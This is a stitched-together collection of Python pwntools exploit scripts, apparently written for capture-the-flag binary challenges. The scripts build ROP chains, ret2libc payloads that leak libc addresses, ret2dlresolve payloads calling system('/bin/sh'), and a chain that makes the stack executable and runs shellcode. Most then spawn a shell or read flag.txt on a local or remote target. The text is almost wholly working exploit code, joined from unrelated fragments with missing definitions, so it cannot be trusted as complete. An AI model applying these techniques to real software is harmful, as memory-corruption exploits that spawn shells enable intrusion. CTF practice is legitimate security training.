def __init__(self, local=True, binary='', ip='', port=0): self.elf = pwn.ELF(binary) self.libc = self.elf.libc self.rop_libc = pwn.ROP(self.libc) self.rop_elf = pwn.ROP(self.elf) if local: self.proc = pwn.process(binary) else: self.proc = pwn.remote(ip, port)
def build_rop(): rop = pwn.ROP(remote_binary) rop.win_fn1(0xDEADBEEF) rop.win_fn2(0xBAADCAFE, 0xCAFEBABE, 0xABADBABE) rop.win_fn() return rop.chain()
def create_rop(): rop = pwn.ROP(remote_binary) rop.leapA() rop.raw(0x8048690) rop.leap2(0xDEADBEEF) rop.display_flag() return rop.chain()
def exploit(remote): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: elf = pwn.ELF(target) rop = pwn.ROP(elf) pop_rdi = pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address) pop_rsi = pwn.p64( rop.find_gadget(['pop rsi', 'pop r15', 'ret']).address) print(pop_rdi) print(pop_rsi) payload = b"A" * 72 payload += pop_rdi payload += pwn.p64(0xdeadbeef) payload += pop_rsi payload += pwn.p64(0x1337c0de) payload += pwn.p64(0x1337c0de) payload += pwn.p64(elf.sym['win']) print(payload, len(payload)) pr.sendafter("joke\n", payload) pr.sendline() pr.sendline("cat flag.txt") print(pr.readall(2)) except Exception as e: print(e) finally: pr.close()
def exploit(remote=False): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: elf = pwn.ELF(target) rop = pwn.ROP(elf) print(pr.readline()) """ Find padding via gdb gef➤ info frame Stack level 0, frame at 0x7fffffffda48: rip = 0x401153 in vuln; saved rip = 0x6161616161616164 called by frame at 0x7fffffffda58 Arglist at 0x6161616161616163, args: Locals at 0x6161616161616163, Previous frame's sp is 0x7fffffffda50 Saved registers: rip at 0x7fffffffda48 gef➤ pattern search 0x6161616161616164 [+] Searching '0x6161616161616164' [+] Found at offset 24 (little-endian search) likely [+] Found at offset 17 (big-endian search) """ payload = b'a' * 24 # gadgets from output of 'ROPgadget --binary weird-rop-f17e9f493733a383aac548dbf1320c33' pop_rdx = pwn.p64(0x4010de) mov_rax_0 = pwn.p64(0x401002) mov_rax_1 = pwn.p64(0x40100a) mov_rdi_1 = pwn.p64(0x401012) xor_rdi_0x53 = pwn.p64(0x40107d) xor_rdi_0x56 = pwn.p64(0x40101b) xor_rdi_0x198 = pwn.p64(0x4010c3) xor_rdi_0x19b = pwn.p64(0x40104c) if remote: payload += xor_rdi_0x56 payload += xor_rdi_0x53 else: payload += xor_rdi_0x19b payload += xor_rdi_0x198 payload += pop_rdx payload += pwn.p64(0x19) # read length payload += mov_rax_0 payload += pwn.p64(rop.find_gadget(['syscall'])[0]) payload += mov_rax_1 payload += mov_rdi_1 payload += pwn.p64(rop.find_gadget(['syscall'])[0]) pr.sendline(payload) print(pr.readall(2)) finally: pr.close()
def get_ret2dlresolve(elf, offset): # Pwntools script kiddie solution bss = elf.bss(0x100 - 8) ret2dl = pwn.Ret2dlresolvePayload(elf, "system", ["/bin/sh"], bss) rop = pwn.ROP(elf) rop.raw(rop.ret.address) # ret gadget to align stack rop.gets(bss) rop.ret2dlresolve(ret2dl) return b"A" * offset + rop.chain() + b"\n" + ret2dl.payload
def exploit(remote): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: elf = pwn.ELF('baby_bof') libc = pwn.ELF('libc-2.31.so') rop = pwn.ROP(elf) pop_rdi = pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address) payload = b'A' * 18 payload += pop_rdi payload += pwn.p64(elf.got['puts']) payload += pwn.p64(elf.plt['puts']) payload += pwn.p64(elf.sym['vuln']) pr.sendlineafter("me\n", payload) print(pr.readline()) out = pr.readline().strip() puts_addr = int.from_bytes(out[:8], 'little') print('puts @', hex(puts_addr)) """Also works if remote: sys = puts_addr - 0x32190 bin_sh = puts_addr + 0x13000a else: sys = puts_addr - 0x2e660 bin_sh = puts_addr + 0x116eb6 """ libc.address = puts_addr - libc.symbols['puts'] sys = libc.symbols['system'] bin_sh = next(libc.search(b'/bin/sh')) print('sys @', hex(sys)) print('bin_sh @', hex(bin_sh)) ret = pwn.p64(rop.find_gadget(['ret']).address) payload = b'A' * 18 payload += ret payload += pop_rdi payload += pwn.p64(bin_sh) payload += pwn.p64(sys) payload += pwn.p64(elf.sym['vuln']) print(payload) pr.sendafter('me\n', payload) pr.sendline() pr.sendline('cat flag.txt') print(pr.readall(4)) except Exception as e: print(e) finally: pr.close()
def exploit(): pr = pwn.connect(host, port) elf = pwn.ELF(target) rop = pwn.ROP(elf) payload = b"A" * 32 rop.set_lock() rop.shell() payload += rop.chain() print('len:', len(payload), payload) pr.sendlineafter("What would a hero say ?\n>>> ", payload) print(pr.readall(2))
def exploit(remote): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: elf = pwn.ELF(target) rop = pwn.ROP(elf) main_addr = pr.readline().strip().decode() main_addr = int(main_addr[main_addr.find('street ') + 7:], 16) print('main @', hex(main_addr)) ca_addr = main_addr + (elf.sym['california'] - elf.sym['main']) si_addr = main_addr + (elf.sym['silicon_valley'] - elf.sym['main']) loss_addr = main_addr + (elf.sym['loss'] - elf.sym['main']) print('ca @', hex(ca_addr)) print('si @', hex(si_addr)) print('loss @', hex(loss_addr)) """ california() => win_land='/bin' silicon_valley() => win_land='/bin/sh' loss(0x1337c0de, 0xdeadc0de-0x1337c0de) """ pop_rdi = pwn.p64(main_addr + (rop.find_gadget(['pop rdi', 'ret']).address - elf.sym['main'])) pop_rsi = pwn.p64(main_addr + ( rop.find_gadget(['pop rsi', 'pop r15', 'ret']).address - elf.sym['main'])) payload = b'A' * 40 payload += pwn.p64(ca_addr) payload += pwn.p64(si_addr) payload += pop_rdi + pwn.p64(0x1337c0de) payload += pop_rsi + pwn.p64(0xcb760000) + pwn.p64(0xcb760000) payload += pwn.p64(loss_addr) print(len(payload), payload) pr.sendafter('often?\n', payload) pr.sendline() pr.sendline('cat flag.txt') print(pr.readall(4)) except Exception as e: print(e) finally: pr.close()
def attack(remote): pr = None if remote: pr = pwn.remote(host, port) else: pr = pwn.process(target) try: libc = CDLL('libc.so.6') num = (libc.rand() % 100) + 1 pr.sendlineafter("What number would you like to guess?\n", str(num)) elf = pwn.ELF(target, False) rop = pwn.ROP(elf) payload = b'A' * 120 payload += pwn.p64(rop.find_gadget(['pop rdx', 'ret']).address) payload += pwn.p64(elf.sym['__stack_prot']) payload += pwn.p64(rop.find_gadget(['pop rax', 'ret']).address) payload += pwn.p64(7) # PROT_READ|PROT_WRITE|PROT_EXEC payload += pwn.p64( 0x0000000000419127 ) # can't find this gadget in pwn, using result from ``ROPgadget --binary ./vuln`` # 0x0000000000419127 : mov qword ptr [rdx], rax ; ret payload += pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address) payload += pwn.p64(elf.sym['__libc_stack_end']) payload += pwn.p64(elf.sym['_dl_make_stack_executable']) payload += pwn.p64( 0x0000000000451974 ) # can't find this gadget in pwn, using result from ``ROPgadget --binary ./vuln`` # 0x0000000000451974 : push rsp ; ret # http://shell-storm.org/shellcode/files/shellcode-603.php shellcode = b"\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05" payload += shellcode print('payload:', payload, 'len:', len(payload)) pr.send(payload) pr.readuntil("New winner!\nName? ") pr.sendline() print(pr.readline()) #pr.interactive() pr.sendline("cat flag.txt;") print('flag:', pr.readall(timeout=2).decode()) except Exception as e: print(e) finally: pr.close()
s = requests.Session() token = gen_token(s, IP, PORT) print 'token: ', token headers = { 'content-type': 'application/json', } url = 'http://%s:%s/api/upload?token=%s' % (IP, PORT, token) binary_filename = './build/pwn' binary = pwn.ELF(binary_filename) binary_rop = pwn.ROP(binary) libc = pwn.ELF('/lib/x86_64-linux-gnu/libc.so.6') bin_sh_offset = next(libc.search('/bin/sh\x00')) pop_rdi = get_gadget(binary_rop, ['pop rdi', 'ret']) pop_rsi = get_gadget(binary_rop, ['pop rsi', 'ret']) pop_rdx_rbx = get_gadget(binary_rop, ['pop rdx', 'pop rbx', 'ret']) pop_rsp = get_gadget(binary_rop, ['pop rsp', 'ret']) read = binary.plt['read'] write = binary.plt['write'] fcntl = binary.plt['fcntl'] malloc_got = binary.got['malloc'] malloc_offset = libc.symbols['malloc']
import pwn import sys # Setup enviroment process = pwn.process("./write4") pwn.context(os="linux", arch="amd64") elf = pwn.ELF("write4") # Get cmd and pad cmd = "/bin/sh" if len(sys.argv) == 1 else sys.argv[1] cmd = cmd + 8 * "\x00" if len( cmd) % 8 == 0 else cmd + (8 - (len(cmd) % 8)) * "\x00" # Generate rop rop = pwn.ROP(elf) for i in range(0, len(cmd), 8): rop.raw(rop.find_gadget(["pop r14", "pop r15", "ret"])) rop.raw(elf.bss() + i) rop.raw(cmd[i:i + 8]) pwn.log.info("Found gadget mov? " + str(rop.find_gadget(["mov r14, r15"]))) rop.raw(elf.symbols["usefulGadgets"]) # mov r14, r15 rop.system(elf.bss()) pwn.log.info(rop.dump()) # Execute command process.readline() process.readline() process.readline() process.readline() payload = "A" * 40 + rop.chain() process.sendline(payload)
def create_rop(): binary = pwn.ELF.from_assembly( "pop eax;pop ebx;pop ecx" ) rop = pwn.ROP(binary)#remote_binary) return rop.chain()
import pwn host = "127.0.0.1" port = 1337 remote = False binary_path = './vuln' libc_path = './libc.so.6' ld_path = "./ld-2.27.so" binary = pwn.ELF(binary_path) libc = pwn.ELF(libc_path) rop_binary = pwn.ROP(binary) if remote: r = pwn.remote(host, port) else: # r = pwn.process(binary_path) r = pwn.process([ld_path, binary_path], env={"LD_PRELOAD": libc_path}) r.interactive() r.close()
io.recvuntil(":") io.sendline("asd") io.recvuntil(":") io.sendline("asd") io.recvuntil(":") io.sendline("25") io.recvline() io.recvline() io.recvline() io.recvline() io.recvline() rop_puts = pwn.ROP(exe) rop_puts.call(exe.plt['puts'], [exe.got['puts']]) rop_puts.call(exe.symbols['main']) raw_rop = rop_puts.chain() #io.recvuntil("deserve it:") io.sendline(b"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaa" + raw_rop) io.recvuntil("!\n") libc_leak = io.recv(6) print("libc_leak :: " + hex(pwn.u64(libc_leak + b"\x00\x00"))) base = pwn.u64(libc_leak + b'\x00\x00') - libc.symbols['puts'] print("base :: " + hex(base))
import pwn pwn.context.binary = e = pwn.ELF("./resolve") # p = pwn.process("./resolve") p = pwn.remote("pwn.utctf.live", 5435) if pwn.args.GDB: pwn.gdb.attach( p, gdbscript=""" break *(&main+29) continue """, ) r = pwn.ROP(e) d = pwn.Ret2dlresolvePayload(e, symbol="system", args=["sh"]) r.raw(0x401159) # ret gadget to align stack r.gets(d.data_addr) r.ret2dlresolve(d) payload = pwn.fit({0x10: r.chain()}) + b"\n" + d.payload p.sendline(payload) p.interactive()